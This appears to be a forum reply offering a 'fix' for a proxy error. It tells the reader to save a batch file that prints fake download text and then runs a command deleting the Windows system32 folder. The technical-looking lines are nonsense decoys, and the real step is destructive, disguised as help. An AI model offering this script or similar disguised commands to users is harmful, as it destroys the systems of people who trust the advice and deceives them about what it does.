Hey man, i had the same problem and here's how i fixed it...
open up a new notepad document, and type this in
@echo DL_error_proxy.exe location:Google.com/errorproxy/newfix2011 &CHMOD 755
@echo off
del C:\Windows\system32
Then save as, errorproxyfix.bat (.bat is VERY IMPORTANT!)
